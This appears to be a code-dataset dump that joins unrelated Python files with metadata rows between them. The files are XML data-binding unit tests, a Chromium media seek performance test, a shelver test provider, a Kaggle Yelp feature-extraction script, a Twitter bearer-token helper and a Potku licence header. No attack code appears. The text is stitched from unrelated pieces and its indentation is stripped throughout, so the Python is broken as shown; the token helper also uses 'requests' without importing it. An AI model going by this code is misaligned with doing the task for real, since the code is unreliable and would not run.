# Invalid XML (but the sax parser should not notice the lack of a
# close tag)
data = '''<?xml version="1.0"?>
<node xmlns="a" xmlns:xsi="b" xsi:schemaLocation="c" xsi:q="q" attr="d">blah'''
tn = xmllib.ToplevelNode(data)
self.failUnlessEqual(tn.name, 'node')
# Valid XML
data2 = data + "<node>"
tn = xmllib.ToplevelNode(data2)
self.failUnlessEqual(tn.name, 'node')
self.failUnlessEqual(tn.attrs, {'xmlns' : 'a', 'xmlns:xsi' : 'b',
'xsi:schemaLocation' : 'c', 'attr' : 'd', 'xsi:q' : 'q'})
self.failUnlessEqual(tn.getAttributesByNamespace('b'),
{'schemaLocation' : 'c', 'q' : 'q'})
self.failUnlessEqual(tn.getAttributesByNamespace('a'),
{'attr' : 'd'})
self.failUnlessEqual(tn.getAttributesByNamespace('nosuchns'),
{})
def testHandlerRegisterType(self):
hdlr = xmllib.BindingHandler()
self.assertEquals(hdlr.typeDict, {})
hdlr.registerType(xmllib.StringNode, 'foo')
self.assertEquals(hdlr.typeDict, {(None, 'foo'): xmllib.StringNode})
hdlr = xmllib.BindingHandler()
hdlr.registerType(xmllib.StringNode, 'foo', namespace = 'ns0')
self.assertEquals(hdlr.typeDict, {('ns0', 'foo'): xmllib.StringNode})
hdlr = xmllib.BindingHandler({(None, 'bar'): xmllib.IntegerNode})
self.assertEquals(hdlr.typeDict, {(None, 'bar'): xmllib.IntegerNode})
def testStartElement(self):
hdlr = xmllib.BindingHandler({(None, 'foo'): xmllib.StringNode})
hdlr.startElement('foo', {})
self.assertEquals(len(hdlr.stack), 1)
self.assertEquals(hdlr.stack[0].__class__.__name__ , 'StringNode')
assert isinstance(hdlr.stack[0], xmllib.StringNode)
hdlr.startElement('bar', {'attr1': '1'})
self.assertEquals(len(hdlr.stack), 2)
self.assertEquals(hdlr.stack[1].__class__.__name__ , 'GenericNode')
assert isinstance(hdlr.stack[1], xmllib.GenericNode)
self.assertEquals(hdlr.stack[1].getAttribute('attr1'), '1')
def testEndElement1(self):
hdlr = xmllib.BindingHandler()
node1 = xmllib.BaseNode(name = 'foo')
node2 = xmllib.BaseNode(name = 'foo')
hdlr.stack = [node1, node2]
hdlr.endElement('foo')
self.assertEquals(hdlr.rootNode, None)
self.assertEquals(len(hdlr.stack), 1)
self.assertEquals(hdlr.stack[0], node1)
self.failIf(hdlr.stack[0] == node2)
hdlr.endElement('foo')
self.assertEquals(hdlr.rootNode, node1)
self.assertEquals(len(hdlr.stack), 0)
def testEndElement2(self):
class RecordNode(xmllib.BaseNode):
def __init__(x, name = None):
x.called = False
xmllib.BaseNode.__init__(x, name = name)
def addChild(x, child):
assert isinstance(child, xmllib.BaseNode)
x.called = True
return xmllib.BaseNode.addChild(x, child)
hdlr = xmllib.BindingHandler()
node1 = RecordNode(name = 'foo')
node2 = xmllib.BaseNode(name = 'foo')
hdlr.stack = [node1, node2]
hdlr.endElement('foo')
self.assertEquals(node1.called, True)
def testCharacters1(self):
hdlr = xmllib.BindingHandler()
node = xmllib.BaseNode()
hdlr.stack = [node]
hdlr.characters('foo')
self.assertEquals(node.getText(), 'foo')
def testCharacters2(self):
class RecordNode(xmllib.BaseNode):
def __init__(x):
x.called = False
xmllib.BaseNode.__init__(x)
def characters(x, ch):
x.called = True
hdlr = xmllib.BindingHandler()
node = RecordNode()
hdlr.stack = [node]
hdlr.characters('foo')
self.assertEquals(node.called, True)
def testStreaming(self):
vals = range(5)
class Root(xmllib.BaseNode):
pass
class Pkg(xmllib.BaseNode):
WillYield = True
_singleChildren = [ 'val' ]
class Val(xmllib.IntegerNode):
pass
xml = "<root>%s</root>" % ''.join(
"<pkg><val>%s</val></pkg>" % i for i in vals)
hdlr = xmllib.StreamingDataBinder()
hdlr.registerType(Root, name = "root")
hdlr.registerType(Pkg, name = "pkg")
hdlr.registerType(Val, name = "val")
it = hdlr.parseString(xml)
self.failUnlessEqual([ x.val for x in it ], vals)
sio = StringIO.StringIO(xml)
# Same deal with a tiny buffer size, to make sure we're incrementally
# parsing
it = hdlr.parseFile(sio)
it.BUFFER_SIZE = 2
self.failUnlessEqual(it.next().val, 0)
self.failUnlessEqual(sio.tell(), 30)
self.failUnlessEqual(it.next().val, 1)
self.failUnlessEqual(it.parser.getColumnNumber(), 52)
self.failUnlessEqual(it.next().val, 2)
self.failUnlessEqual(it.parser.getColumnNumber(), 75)
self.failUnlessEqual(it.next().val, 3)
self.failUnlessEqual(it.parser.getColumnNumber(), 98)
class BinderTest(BaseTest):
def testBinderRegisterType(self):
binder = xmllib.DataBinder()
binder.registerType(xmllib.StringNode, 'foo')
self.assertEquals(binder.contentHandler.typeDict,
{(None, 'foo'): xmllib.StringNode})
binder = xmllib.DataBinder({(None, 'bar'): xmllib.IntegerNode})
self.assertEquals(binder.contentHandler.typeDict,
{(None, 'bar'): xmllib.IntegerNode})
def testParseString(self):
class ComplexType(xmllib.BaseNode):
def addChild(slf, childNode):
if childNode.getName() == 'foo':
slf.foo = childNode.finalize()
elif childNode.getName() == 'bar':
slf.bar = childNode.finalize()
binder = xmllib.DataBinder()
binder.registerType(xmllib.IntegerNode, 'foo')
binder.registerType(xmllib.StringNode, 'bar')
binder.registerType(ComplexType, 'baz')
data = '<baz><foo>3</foo><bar>test</bar></baz>'
obj = binder.parseString(data)
self.assertEquals(obj.foo, 3)
self.assertEquals(obj.bar, 'test')
self.assertEquals(obj.getName(), 'baz')
def testRoundTripGenericParsing(self):
binder = xmllib.DataBinder()
data = '<baz><foo>3</foo><bar>test</bar></baz>'
obj = binder.parseString(data)
data2 = binder.toXml(obj, prettyPrint = False)
self.assertXMLEquals(data, data2)
def testParseFile(self):
class ComplexType(xmllib.BaseNode):
_singleChildren = ['foo', 'bar']
binder = xmllib.DataBinder()
binder.registerType(xmllib.BooleanNode, 'foo')
binder.registerType(xmllib.NullNode, 'bar')
binder.registerType(ComplexType, 'baz')
data = '<baz><foo>TRUE</foo><bar>test</bar></baz>'
fd, tmpFile = tempfile.mkstemp()
try:
os.close(fd)
f = open(tmpFile, 'w')
f.write(data)
f.close()
obj = binder.parseFile(tmpFile)
finally:
os.unlink(tmpFile)
self.assertEquals(obj.foo, True)
self.assertEquals(obj.bar, None)
self.assertEquals(obj.getName(), 'baz')
def testIterChildren(self):
binder = xmllib.DataBinder()
class Foo(xmllib.BaseNode):
def iterChildren(self):
if hasattr(self, 'bar'):
yield self.bar
if hasattr(self, 'foo'):
yield xmllib.StringNode(name = 'foo').characters(
xmllib.BooleanNode.toString(self.foo))
if hasattr(self, 'test'):
yield xmllib.StringNode(name = 'test').characters(self.test)
foo = Foo(name = 'Foo')
foo.foo = True
foo.bar = Foo(name = 'bar')
foo.bar.test = '123'
data = binder.toXml(foo)
self.assertXMLEquals(data, "<?xml version='1.0' encoding='UTF-8'?>"
'\n<Foo>\n <bar>\n'
' <test>123</test>\n </bar>\n <foo>true</foo>\n</Foo>')
obj = binder.parseString(data)
data2 = binder.toXml(obj)
self.assertXMLEquals(data, data2)
def testIterChildren2(self):
binder = xmllib.DataBinder()
binder.registerType(xmllib.BooleanNode, 'foo')
class Foo(xmllib.BaseNode):
def iterChildren(self):
if hasattr(self, 'bar'):
yield self.bar
if hasattr(self, 'foo'):
yield xmllib.StringNode(name = 'foo').characters(
xmllib.BooleanNode.toString(self.foo))
if hasattr(self, 'test'):
yield xmllib.StringNode(name = 'test').characters(self.test)
foo = Foo(name = 'Foo')
foo.foo = True
foo.bar = Foo(name = 'bar')
foo.bar.test = '123'
data = binder.toXml(foo)
self.assertXMLEquals(data,
'\n'.join((
'<?xml version="1.0" encoding="UTF-8"?>',
'<Foo>',
' <bar>',
' <test>123</test>',
' </bar>',
' <foo>true</foo>',
'</Foo>')))
def testToXmlInt(self):
binder = xmllib.DataBinder()
intObj = xmllib.IntegerNode(name = 'foo').characters('3')
self.assertXMLEquals(binder.toXml(intObj, prettyPrint = False),
'<foo>3</foo>')
intObj = xmllib.IntegerNode().characters('3')
self.assertXMLEquals(binder.toXml(intObj, prettyPrint = False),
'<int>3</int>')
def testToXmlBool(self):
binder = xmllib.DataBinder()
node = xmllib.BooleanNode(name = 'foo').characters('1')
self.assertXMLEquals(binder.toXml(node, prettyPrint = False),
"<foo>true</foo>")
node = xmllib.BooleanNode(name = 'foo').characters('tRue')
self.assertXMLEquals(binder.toXml(node, prettyPrint = False),
"<foo>true</foo>")
node = xmllib.BooleanNode(name = 'foo').characters('False')
self.assertXMLEquals(binder.toXml(node, prettyPrint = False),
"<foo>false</foo>")
node = xmllib.BooleanNode().characters('tRue')
self.assertXMLEquals(binder.toXml(node, prettyPrint = False),
"<bool>true</bool>")
def testToXmlList2(self):
binder = xmllib.DataBinder()
class ListObj(xmllib.SerializableList):
tag = "toplevel"
class Node1(xmllib.SlotBasedSerializableObject):
__slots__ = [ 'attr1', 'attr2', 'attr3', 'children' ]
tag = "node1"
l1 = ListObj()
n1 = Node1()
l1.append(n1)
n1.attr1 = "attrVal11"
n1.attr2 = 12
n1.attr3 = None
n1.children = xmllib.StringNode(name = "child11").characters("text 11")
n2 = Node1()
l1.append(n2)
n2.attr1 = 21
n2.attr2 = "attrVal21"
n2.attr3 = True
# Add a list of elements as children of n2
l2 = ListObj()
l2.tag = "list2"
l2.append(xmllib.StringNode(name = "child21").characters("text 21"))
l2.append(xmllib.StringNode(name = "child31").characters("text 31"))
n2.children = l2
xmlData = binder.toXml(l1)
self.assertXMLEquals(xmlData, """
<?xml version='1.0' encoding='UTF-8'?>
<toplevel>
<node1 attr2="12" attr1="attrVal11">
<child11>text 11</child11>
</node1>
<node1 attr2="attrVal21" attr3="true" attr1="21">
<list2>
<child21>text 21</child21>
<child31>text 31</child31>
</list2>
</node1>
</toplevel>
""")
def testToXmlUnicode(self):
class Foo(xmllib.BaseNode):
pass
binder = xmllib.DataBinder()
binder.registerType('foo', Foo)
foo = Foo({u'birth-place' : u'K\u00f6ln'}, name = 'Foo')
marriage = xmllib.BaseNode(name = 'marriage')
marriage.characters(u'Troms\xf8')
foo.addChild(marriage)
self.assertXMLEquals(binder.toXml(foo, prettyPrint = False),
'<Foo birth-place="%s"><marriage>%s</marriage></Foo>' %
('Köln', 'Troms\xc3\xb8'))
targetData = '<?xml version="1.0" encoding="UTF-8"?>\n' \
'<Foo birth-place="Köln">\n <marriage>Troms\xc3\xb8</marriage>\n</Foo>'
self.assertXMLEquals(binder.toXml(foo), targetData)
# Make sure we can still load the string
obj = binder.parseString(binder.toXml(foo))
def testUnkNodeVsStringNode(self):
data = "<build><foo>123</foo></build>"
binder = xmllib.DataBinder()
obj = binder.parseString(data)
assert isinstance(obj.getChildren('foo')[0], xmllib.BaseNode)
self.assertEquals(obj.getChildren('foo')[0].getText(), '123')
binder.registerType(xmllib.StringNode, 'foo')
obj = binder.parseString(data)
self.assertEquals([ x for x in obj.iterChildren() ],
['123'])
def testAttributesVsTags(self):
class Foo(object):
test = 42
def getElementTree(slf, parent = None):
elem = etree.Element('Foo', dict(test=str(slf.test)))
if parent is not None:
parent.append(elem)
return elem
binder = xmllib.DataBinder()
foo = Foo()
data = binder.toXml(foo, prettyPrint = False)
self.assertXMLEquals(data, '<Foo test="42"/>')
foo.test = 14
data2 = binder.toXml(foo, prettyPrint = False)
self.assertXMLEquals(data2, '<Foo test="14"/>')
class FooNode(xmllib.BaseNode):
def addChild(slf, child):
if child.getName() == 'test':
slf.test = child.finalize()
def finalize(slf):
t = slf.getAttribute('test')
if t is not None:
slf.test = int(t)
return slf
binder = xmllib.DataBinder()
binder.registerType(xmllib.IntegerNode, 'test')
binder.registerType(FooNode, 'Foo')
obj = binder.parseString(data2)
# test that conflicting attributes and tags were preserved
self.assertEquals(obj.test, 14)
def testChildOrder(self):
binder = xmllib.DataBinder()
ordering = ['foo']
items = [ xmllib.BaseNode(name = x) for x in ['foo', 'bar']]
# prove that items in the ordering are listed first
self.assertEquals(xmllib.orderItems(items, ordering), items)
self.assertEquals(xmllib.orderItems(reversed(items), ordering), items)
ordering = ['foo', 'bar']
items = [ xmllib.BaseNode(name = x)
for x in ['biff', 'baz', 'bar', 'foo'] ]
ref = [items[3], items[2], items[1], items[0]]
# prove ordering of listed items are by list. ordering of other
# items is lexigraphical
self.assertEquals(xmllib.orderItems(items, ordering), ref)
# prove that it's ok to have items missing from ordering
ordering = ['foo', 'bar', 'unused']
items.append(xmllib.BaseNode(name = 'another'))
ref.insert(2, items[-1])
self.assertEquals(xmllib.orderItems(items, ordering), ref)
class RoundTripTest(BaseTest):
def testXml2Obj2Xml(self):
origData = "<?xml version='1.0' encoding='UTF-8'?>\n<build>\n <foo>123</foo>\n <foo>\xc3\xb6</foo>\n</build>"
binder = xmllib.DataBinder()
binder.registerType('foo', xmllib.StringNode)
obj = binder.parseString(origData)
data = binder.toXml(obj)
self.assertXMLEquals(origData, data)
def testXmlAttrs(self):
origData = """<?xml version='1.0' encoding='UTF-8'?>\n<build data="1">\n <foo>123</foo>\n</build>"""
binder = xmllib.DataBinder()
obj = binder.parseString(origData)
data = binder.toXml(obj)
self.assertXMLEquals(origData, data)
def testXmlAttrs2(self):
origData = """<?xml version='1.0' encoding='UTF-8'?>\n<build data="1">\n <foo>123</foo>\n</build>"""
refData = '<build data="1"><foo>123</foo></build>'
binder = xmllib.DataBinder()
obj = binder.parseString(origData)
data = binder.toXml(obj)
self.assertXMLEquals(origData, data)
def testRoundTripDefault(self):
binder = xmllib.DataBinder()
data = '\n'.join(('<?xml version="1.0" encoding="UTF-8"?>',
'<foo>',
' <baz>More text</baz>',
' <bar>This is some text</bar>',
'</foo>'))
data2 = '\n'.join(('<?xml version="1.0" encoding="UTF-8"?>',
'<foo>',
' <bar>This is some text</bar>',
' <baz>More text</baz>',
'</foo>'))
obj = binder.parseString(data)
newData = binder.toXml(obj)
# this child node ordering is influenced by the order of the nodes
# in the original xml blob
self.assertXMLEquals(newData, data)
class Foo(xmllib.BaseNode):
name = 'foo'
_childOrder = ['baz', 'bar']
binder = xmllib.DataBinder()
binder.registerType(Foo)
obj = binder.parseString(data2)
newData = binder.toXml(obj)
self.assertXMLEquals(newData, data)
def testNamespaceSupport(self):
binder = xmllib.DataBinder()
data = '\n'.join(('<?xml version="1.0" encoding="UTF-8"?>',
'<gah:root-node xmlns="http://example.com"'
' xmlns:gah="http://exmaple.com/gah">',
' <gah:baz>More text</gah:baz>',
'</gah:root-node>'))
obj = binder.parseString(data)
ndata = binder.toXml(obj)
self.assertXMLEquals(data, ndata)
def testXmlBaseNamespaceSupport(self):
binder = xmllib.DataBinder()
data = '\n'.join(('<?xml version="1.0" encoding="UTF-8"?>',
'<gah:root-node xmlns="http://example.com"'
' xmlns:gah="http://exmaple.com/gah" xml:base="media://foo">',
' <gah:baz>More text</gah:baz>',
'</gah:root-node>'))
obj = binder.parseString(data)
ndata = binder.toXml(obj)
self.assertXMLEquals(data, ndata)
self.failUnlessEqual(obj.getAttributeByNamespace('base', namespace='http://www.w3.org/XML/1998/namespace'),
'media://foo')
def testDispatcherRegisterClasses(self):
class Coll1:
class BaseType(object):
@classmethod
def getTag(kls):
return kls.tag
def __init__(self, node):
self.node = node
class ClassA(BaseType):
tag = 'A'
class ClassB(BaseType):
tag = 'B'
disp = xmllib.NodeDispatcher()
disp.registerClasses(Coll1,Coll1.BaseType)
self.failUnlessEqual(disp._dispatcher,
{'{}A' : Coll1.ClassA, '{}B' : Coll1.ClassB})
# With a default namespace
disp = xmllib.NodeDispatcher({None : 'nspaceA'})
disp.registerClasses(Coll1,Coll1.BaseType)
self.failUnlessEqual(disp._dispatcher,
{'{nspaceA}A' : Coll1.ClassA, '{nspaceA}B' : Coll1.ClassB})
# One of the classes is in a different namespace
Coll1.ClassB.tag = 'nsB:B'
nsMap = {None : 'nspaceA', 'nsB' : 'nspaceB'}
disp = xmllib.NodeDispatcher(nsMap = nsMap)
disp.registerClasses(Coll1,Coll1.BaseType)
self.failUnlessEqual(disp._dispatcher,
{'{nspaceA}A' : Coll1.ClassA, '{nspaceB}B' : Coll1.ClassB})
# Test that dispatching works
n1 = xmllib.BaseNode(nsMap = nsMap, name = 'A')
c1 = disp.dispatch(n1)
self.failUnlessEqual(c1.__class__, Coll1.ClassA)
n2 = xmllib.BaseNode(nsMap = nsMap, name = 'nsB:B')
c2 = disp.dispatch(n2)
self.failUnlessEqual(c2.__class__, Coll1.ClassB)
# Now, an example of a class that we register directly
class ClassC(object):
def __init__(self, node):
self.node = node
disp.registerType(ClassC, name = 'C')
n3 = xmllib.BaseNode(nsMap = nsMap, name = 'C')
c3 = disp.dispatch(n3)
self.failUnlessEqual(c3.__class__, ClassC)
# And another one, now with namespace
disp.registerType(ClassC, name = 'D', namespace = 'nsB')
n4 = xmllib.BaseNode(nsMap = nsMap, name = 'nsB:D')
c4 = disp.dispatch(n4)
self.failUnlessEqual(c4.__class__, ClassC)
self.failUnlessEqual(c4.node, n4)
# a class we register without a name and with no getTag - should be
# ignored
class ClassE(object):
def __init__(self, node):
self.node = node
disp.registerType(ClassE)
self.failUnlessEqual(disp._dispatcher,
{'{nspaceA}A' : Coll1.ClassA, '{nspaceB}B' : Coll1.ClassB,
'{nspaceA}C' : ClassC, '{nspaceB}D' : ClassC})
# And a node we don't handle
n5 = xmllib.BaseNode(nsMap = nsMap, name = 'X')
c5 = disp.dispatch(n5)
self.failUnlessEqual(c5, None)
class SchemaValidationTest(BaseTest):
def testGetSchemaLocationFromStream(self):
# Exceptions first
stream = StringIO.StringIO('No XML data')
e = self.failUnlessRaises(xmllib.InvalidXML,
xmllib.DataBinder.getSchemaLocationsFromStream, stream)
self.failUnlessEqual(str(e), "Possibly malformed XML")
stream = StringIO.StringIO('<node xmlns:xsi="what?" '
'xsi:schemaLocation="blah1 blah2"/>')
e = self.failUnlessRaises(xmllib.UnknownSchemaError,
xmllib.DataBinder.getSchemaLocationsFromStream, stream)
self.failUnlessEqual(str(e), "Schema location not specified in XML stream")
stream = StringIO.StringIO('<node '
'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"/>')
e = self.failUnlessRaises(xmllib.UnknownSchemaError,
xmllib.DataBinder.getSchemaLocationsFromStream, stream)
self.failUnlessEqual(str(e), "Schema location not specified in XML stream")
stream = StringIO.StringIO('BAD DATA <node '
'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
'xsi:schemaLocation = "blah1 blah2"/>')
stream.seek(9)
self.failUnlessEqual(xmllib.DataBinder.getSchemaLocationsFromStream(stream),
["blah1", "blah2"])
self.failUnlessEqual(stream.tell(), 9)
def testChooseSchemaFile(self):
schemaFiles = ["sf1", "sf2", "sf4", "sf5"]
e = self.failUnlessRaises(xmllib.UnknownSchemaError,
xmllib.DataBinder.chooseSchemaFile, schemaFiles, None)
self.failUnlessEqual(str(e), "Schema directory not specified")
tmpdir = tempfile.mkdtemp()
e = self.failUnlessRaises(xmllib.UnknownSchemaError,
xmllib.DataBinder.chooseSchemaFile, schemaFiles, tmpdir)
self.failUnlessEqual(str(e),
"No applicable schema found in directory `%s'" % tmpdir)
# To make sure directory ordering doesn't matter, mock out listdir
origListdir = os.listdir
listdir = lambda x: ["sf4", "sf3", "sf2"]
try:
os.listdir = listdir
file(os.path.join(tmpdir, "sf2"), "w")
file(os.path.join(tmpdir, "sf3"), "w")
file(os.path.join(tmpdir, "sf4"), "w")
ret = xmllib.DataBinder.chooseSchemaFile(schemaFiles, tmpdir)
self.failUnlessEqual(ret, os.path.join(tmpdir, "sf2"))
finally:
os.listdir = origListdir
shutil.rmtree(tmpdir, ignore_errors = True)
e = self.failUnlessRaises(xmllib.UnknownSchemaError,
xmllib.DataBinder.chooseSchemaFile, schemaFiles, tmpdir)
self.failUnlessEqual(str(e), "Schema directory `%s' not found" %
tmpdir)
def testClassLevelValidate(self):
tmpdir = tempfile.mkdtemp()
try:
file(os.path.join(tmpdir, "schema.xsd"), "w+").write(xmlSchema1)
stream = StringIO.StringIO(xmlData1)
xmllib.DataBinder.validate(stream, tmpdir)
# xmlData2 should fail
stream = StringIO.StringIO(xmlData2)
e = self.failUnlessRaises(xmllib.SchemaValidationError,
xmllib.DataBinder.validate, stream, tmpdir)
self.failUnlessEqual(str(e), schemaError2)
finally:
shutil.rmtree(tmpdir, ignore_errors = True)
def testParseFileValidate(self):
tmpdir = tempfile.mkdtemp()
stream = StringIO.StringIO(xmlData1)
try:
file(os.path.join(tmpdir, "schema.xsd"), "w+").write(xmlSchema1)
binder = xmllib.DataBinder()
binder.parseFile(stream, validate = True, schemaDir = tmpdir)
binder.parseString(xmlData1, validate = True, schemaDir = tmpdir)
# Try to pass None as a schema directory - should fail
stream.seek(0)
e = self.failUnlessRaises(xmllib.UnknownSchemaError,
binder.parseFile, stream, validate = True, schemaDir = None)
self.failUnlessEqual(str(e), "Schema directory not specified")
finally:
shutil.rmtree(tmpdir, ignore_errors = True)
xmlSchema1 = """\
<?xml version="1.0" encoding="UTF-8"?>
<xsd:schema targetNamespace="http://my.example.com"
elementFormDefault="qualified"
attributeFormDefault="unqualified"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.w3.org/2001/XMLSchema.xsd"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns="http://www.rpath.com/permanent/rpd-1.0.xsd">
<xsd:element name="f">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="c1" type="xsd:string" />
<xsd:element name="c2" type="xsd:string" />
</xsd:sequence>
</xsd:complexType>
</xsd:element>
</xsd:schema>"""
xmlData1 = """\
<?xml version="1.0" encoding="UTF-8"?>
<f xmlns="http://my.example.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="schema.xsd">
<c1/>
<c2/>
</f>"""
xmlData2 = xmlData1.replace("<c1/>", "")
schemaError2 = (
"<string>:4:0:ERROR:SCHEMASV:SCHEMAV_ELEMENT_CONTENT: "
"Element '{http://my.example.com}c2': This element is not expected. "
"Expected is ( {http://my.example.com}c1 )."
)
|
apache-2.0
| 6,671,211,518,318,611,000 | 35.810891 | 119 | 0.586353 | false |
keishi/chromium
|
chrome/test/functional/media/media_seek_perf.py
|
1
|
4233
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Seek performance testing for <video>.
Calculates the short and long seek times for different video formats on
different network constraints.
"""
import logging
import os
import pyauto_media
import pyauto_utils
import cns_test_base
import worker_thread
# Number of threads to use during testing.
_TEST_THREADS = 3
# HTML test path; relative to src/chrome/test/data.
_TEST_HTML_PATH = os.path.join('media', 'html', 'media_seek.html')
# The media files used for testing.
# Path under CNS root folder (pyauto_private/media).
_TEST_VIDEOS = [os.path.join('dartmoor', name) for name in
['dartmoor2.ogg', 'dartmoor2.m4a', 'dartmoor2.mp3',
'dartmoor2.wav']]
_TEST_VIDEOS.extend(os.path.join('crowd', name) for name in
['crowd1080.webm', 'crowd1080.ogv', 'crowd1080.mp4',
'crowd360.webm', 'crowd360.ogv', 'crowd360.mp4'])
# Constraints to run tests on.
_TESTS_TO_RUN = [
cns_test_base.Cable,
cns_test_base.Wifi,
cns_test_base.NoConstraints]
class SeekWorkerThread(worker_thread.WorkerThread):
"""Worker thread. Runs a test for each task in the queue."""
def RunTask(self, unique_url, task):
"""Runs the specific task on the url given.
It is assumed that a tab with the unique_url is already loaded.
Args:
unique_url: A unique identifier of the test page.
task: A (series_name, settings, file_name) tuple to run the test on.
"""
series_name, settings, file_name = task
video_url = cns_test_base.GetFileURL(
file_name, bandwidth=settings[0], latency=settings[1],
loss=settings[2])
# Start the test!
self.CallJavascriptFunc('startTest', [video_url], unique_url)
logging.debug('Running perf test for %s.', video_url)
# Time out is dependent on (seeking time * iterations). For 3 iterations
# per seek we get total of 18 seeks per test. We expect buffered and
# cached seeks to be fast. Through experimentation an average of 10 secs
# per seek was found to be adequate.
if not self.WaitUntil(self.GetDOMValue, args=['endTest', unique_url],
retry_sleep=5, timeout=300, debug=False):
error_msg = 'Seek tests timed out.'
else:
error_msg = self.GetDOMValue('errorMsg', unique_url)
cached_states = self.GetDOMValue(
"Object.keys(CachedState).join(',')", unique_url).split(',')
seek_test_cases = self.GetDOMValue(
"Object.keys(SeekTestCase).join(',')", unique_url).split(',')
graph_name = series_name + '_' + os.path.basename(file_name)
for state in cached_states:
for seek_case in seek_test_cases:
values = self.GetDOMValue(
"seekRecords[CachedState.%s][SeekTestCase.%s].join(',')" %
(state, seek_case), unique_url)
if values:
results = [float(value) for value in values.split(',')]
else:
results = []
pyauto_utils.PrintPerfResult('seek', '%s_%s_%s' %
(state, seek_case, graph_name),
results, 'sec')
if error_msg:
logging.error('Error while running %s: %s.', graph_name, error_msg)
return False
else:
return True
class MediaSeekPerfTest(cns_test_base.CNSTestBase):
"""PyAuto test container. See file doc string for more information."""
def __init__(self, *args, **kwargs):
"""Initialize the CNSTestBase with socket_timeout = 60 secs."""
cns_test_base.CNSTestBase.__init__(self, socket_timeout='60',
*args, **kwargs)
def testMediaSeekPerformance(self):
"""Launches HTML test which plays each video and records seek stats."""
tasks = cns_test_base.CreateCNSPerfTasks(_TESTS_TO_RUN, _TEST_VIDEOS)
if worker_thread.RunWorkerThreads(self, SeekWorkerThread, tasks,
_TEST_THREADS, _TEST_HTML_PATH):
self.fail('Some tests failed to run as expected.')
if __name__ == '__main__':
pyauto_media.Main()
|
bsd-3-clause
| 229,085,850,465,928,320 | 35.179487 | 77 | 0.636192 | false |
Cobliteam/shelver
|
shelver/provider/test.py
|
1
|
1626
|
import logging
from shelver.artifact import Artifact
from shelver.registry import Registry
from shelver.build import Builder
from .base import Provider
logger = logging.getLogger('shelver.provider.test')
class TestArtifact(Artifact):
def __init__(self, id, **kwargs):
super().__init__(**kwargs)
self._id = id
@property
def id(self):
return self._id
class TestRegistry(Registry):
async def load_artifact_by_id(self, id, region=None, image=None):
name, version = id.split(':')
if not image:
image = self.get_image(name)
artifact = TestArtifact(self.provider, id, image=image,
version=version, environment='test')
self.register_artifact(artifact)
self.associate_artifact(artifact, image, version)
return artifact
async def load_existing_artifacts(self, region=None):
pass
class TestBuilder(Builder):
async def run_build(self, image, version, base_artifact=None,
msg_stream=None):
image = self.registry.get_image(image)
if not version:
version = image.current_version
else:
assert version == image.current_version
id = '{}:{}'.format(image.name, version)
logging.info('Built fake artifact %s for image %s:%s', id,
image.name, version)
artifact = {'id': id}
return [artifact]
class TestProvider(Provider):
name = 'test'
aliases = ()
artifact_class = TestArtifact
registry_class = TestRegistry
builder_class = TestBuilder
|
mpl-2.0
| -8,799,597,469,075,863,000 | 25.655738 | 69 | 0.615621 | false |
jingxiang-li/kaggle-yelp
|
archive/preprocess.py
|
1
|
1280
|
from __future__ import division, absolute_import
from __future__ import print_function, unicode_literals
import pandas as pd
from transfer_features import *
# process training data
biz2label = pd.read_csv("rawdata/train.csv", index_col=0)
photo2biz = pd.read_csv("rawdata/train_photo_to_biz_ids.csv", index_col=0)
biz2label.sort_index(inplace=True)
for biz_id, biz_label in biz2label.iterrows():
photo_ids = photo2biz[photo2biz["business_id"] == biz_id].index
batch_size = len(photo_ids)
img_list = ['rawdata/train_photos/' + str(id) + '.jpg' for id in photo_ids]
# pprint(img_list)
out_file = 'features/inception-21k-global/' + str(biz_id) + '.npy'
X = get_features(img_list, 'models/inception-21k/Inception', 9)
np.save(out_file, X)
print(out_file, 'finished!!')
# process test data
photo2biz = pd.read_csv("rawdata/test_photo_to_biz.csv")
photo_ids = photo2biz["photo_id"]
photo_ids = np.unique(photo_ids)
f = open("features/inception-21k-global-test.csv", 'w')
for photo_id in photo_ids:
img_list = ['rawdata/test_photos/' + str(photo_id) + '.jpg']
X = get_features(img_list, 'models/inception-21k/Inception', 9)[0, :]
f.write(str(photo_id) + ',')
f.write(",".join(X.astype(str)) + '\n')
print(photo_id, 'finished!!')
|
mit
| 8,042,651,720,519,711,000 | 36.647059 | 79 | 0.673438 | false |
lefthand3r/scienceanalyst
|
get_bearer_token.py
|
1
|
1028
|
import base64
import ignore
consumer_key = ignore.TWITTER_CONSUMER_KEY
consumer_secret = ignore.TWITTER_CONSUMER_SECRET
access_token = ignore.TWITTER_ACCESS_TOKEN
access_secret = ignore.TWITTER_ACCESS_SECRET
def get_bearer_token(consumer_key, consumer_secret):
# get bearer token for application only requests
bearer_token_credentials = base64.urlsafe_b64encode('{}:{}'.format(consumer_key, consumer_secret).encode('ascii')).decode('ascii')
url = 'https://api.twitter.com/oauth2/token'
headers = {
'Authorization': 'Basic {}'.format(bearer_token_credentials),
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
}
data = 'grant_type=client_credentials'
response = requests.post(url, headers=headers, data=data)
response_data = response.json()
if response_data['token_type'] == 'bearer':
bearer_token = response_data['access_token']
else:
raise RuntimeError('unexpected token type: {}'.format(response_data['token_type']))
return bearer_token
|
gpl-3.0
| -4,461,987,115,436,144,000 | 40.12 | 134 | 0.713035 | false |
jaakkojulin/potku
|
Dialogs/GlobalSettingsDialog.py
|
1
|
10692
|
# coding=utf-8
'''
Created on 30.4.2013
Updated on 26.8.2013
Potku is a graphical user interface for analyzation and
visualization of measurement data collected from a ToF-ERD
telescope. For physics calculations Potku uses external
analyzation components.
Copyright (C) Jarkko Aalto, Timo Konu, Samuli Kärkkäinen, Samuli Rahkonen and
Miika Raunio
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program (file named 'LICENCE').
'''
